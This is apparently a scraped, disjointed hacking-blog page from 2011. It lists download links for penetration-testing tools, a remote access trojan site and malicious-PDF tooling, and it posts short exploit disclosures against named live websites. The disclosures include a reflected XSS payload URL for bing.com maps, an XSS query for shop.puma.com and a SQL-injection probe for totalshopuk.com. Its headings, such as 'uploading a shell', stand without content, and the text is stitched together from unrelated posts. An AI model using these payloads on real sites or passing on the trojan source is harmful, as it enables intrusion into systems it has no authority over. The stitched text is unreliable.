uploading a shell



IPB Shell uploading

Automatic tools play an important role in the field of penetration testing, either the test will going to conduct for network or for web application.

Web application penetration testing is very important for the high profile companies and for those services like E-commerce to secure the data of the user.


Key Feature

It support MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries support.
It support anonymous proxy.
It support http header cookies.
Basic web server software and web application technology fingerprint.
And more....

It available for both windows and linux plate form.

Download
Linux Source: sqlmap-0.9.tar.gz
http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/download
Windows Portable: sqlmap-exe.zip
http://downloads.sourceforge.net/sqlmap/sqlmap-0.7_exe.zip

The Uniscan vulnerability scanner is aimed at information security, which aims at finding vulnerabilities in Web systems. The Uniscan was developed using the Perl programming language to be easier to work with text, has an easy to use regular expressions and is also multi-threaded.

It is dedicated for web application security find vulnerabilities before other do. Can easliy find known vulnerabilities gets regularly updated and bugs and news features are added on regular intervals.

Tutorials to create plug-ins:
http://www.uniscan.com.br/tutorial1.php
http://www.uniscan.com.br/tutorial2.php
http://www.uniscan.com.br/tutorial3.php


Download
http://www.uniscan.com.br/download.html

INSECT can help to build a strong security posture that is easy to use so both professional penetration testers and less experienced security pros will have all the tools they need to reduce costs, proactively find vulnerabilities, assess risk, and check the effectiveness of security defenses.

The latest version includes more than 100 native exploits, 300 metasploit modules and web vulnerability scanner.

Download
http://www.insecurityresearch.com/files/download

Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected

Description
------------------
BING.COM is prone to a XSS vulnerability because the application fails
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the
victim's browser.

Details
-------------------
The reflected XSS vulnerability is a variant of a cross-site scripting
flaw: it occurs when the data provided by the attacker is exectued by
the browser, and then displayed on "normal" pages returned to other
users in the course of regular browsing, without proper HTML escaping. A
classic example of this is with online message boards where users are
allowed to post HTML formatted messages for other users to read

Exploit example as follow
-----------------------------

http://www.bing.com/maps/embed/Customize.aspx
?v=2
&cp=-34.59999847400003~-58.45000076200001
&lvl=6
&dir=0
&sty=c
&eo=
&where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))//
&form=LMLTEW

The vulnerability is caused by the following code and affected by the
Generate Code map


by
runlvl

Among the features of the new tool are:

Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the science
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.

Download
http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip

Source
http://pastebin.com/jCNvzw1s

by
xero

How NESSUS works
http://www.cs.cmu.edu/~dwendlan/personal/nessus.html

How to use NESSUS
http://www.symantec.com/connect/articles/introduction-nessus

Download
http://www.nessus.org/products/nessus/nessus-download-agreement

This issue covers Gonna’ Break It on Gonna’ Kick it Root Down in Tech Gyan, RSA Security in Moms Guide, SniffJoke – Defeating Interception Framework in Tool Gyan, Patent Law and Computer Technology in Legal Gyan and Social Engineering Toolkit in Matriux Vibhag

Download PDF
http://chmag.in/issue/aug2011.pdf

This issue covers following articles:-

0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF

Download PDF
http://chmag.in/issue/jul2011.pdf

If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you.
http://ha.ckers.org/xss.html

Here you find my custom XSS and CSRF cheat sheet
http://www.xenuser.org/xss-cheat-sheet/

Protecting your Facebook account
Avoiding the scammers (very helpful examples of the most popular Facebook scams)
Using advanced security settings (one-time passwords, secure browsing, singel sign-on, social authentication, etc.)
Recovering a hacked Facebook account
Stopping imposters

Download PDF
https://www.facebook.com/safety/attachment/Guide%20to%20Facebook%20Security.pdf

Uniscan Features

Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.

Download
http://sourceforge.net/projects/uniscan/files/4.0/uniscan.tar/download

JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommended our proxy tool JonDo but you may use other anonymsation services like Tor Onion Router.

Download
https://anonymous-proxy-servers.net/en/jondofox.html

The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Download
http://code.google.com/p/zaproxy/downloads/list

Tor is a software project that lets you use the Internet anonymously. tor2web is a project to let Internet users access anonymous servers.

Source
http://tor2web.org/

Public release : 20/08/2011

Download
https://code.google.com/p/schwarzesonenrat/

http://www.shop.puma.com
Type: XSS
Exploitable:
hxxp://www.shop.puma.com/on/demandware.store/Sites-US-Site/en_US/Search-Show?q=alert(1)

Origami is a Ruby framework designed to parse, analyze, and forge PDF documents. This is NOT a PDF rendering library. It aims at providing a scripting tool to generate and analyze malicious PDF files. As well, it can be used to create on-the-fly customized PDFs, or to inject code into already existing documents.

Download
Origami uses the Mercurial repository that can be accessed with this command:
hg clone https://origami-pdf.googlecode.com/hg/ origami

Source
http://www.noptrix.net/advisories/skype_inject.txt

Public release : 20/08/2011 at 17:35

Download
http://www.darkcomet-rat.com/

Source
http://pastebin.com/Ny3WLPpu

http://www.totalshopuk.com

Exploit:
products/c/index.php/1'

by
Eyüp CELIK

1
http://securityxploit.blogger.de/stories/1859047/
2
http://securityxploit.blogger.de/stories/1864857/
3
http://securityxploit.blogger.de/stories/1857035/
4
http://securityxploit.blogger.de/stories/1846646/
5
http://securityxploit.blogger.de/stories/1854802/

This release contains over 120 bug fixes, 30 new tools and 70 tool updates.
The kernel was updated to 2.6.39.4 and includes the relevant injection patches.

Download
http://www.backtrack-linux.org/downloads/

For the first few days there will be torrent downloads only.
HTTP downloads will be available from Aug 20th.

RAFT is a testing tool for the identification of vulnerabilities in web applications. It is a suite of tools that utilize common shared elements to make testing and analysis easier. It uses markup by means of a built-in WebKit based web browser to create templates for fuzz testing.

Download
RAFT 2011.7.14-alpha
svn checkout http://raft.googlecode.com/svn/trunk/ raft-read-only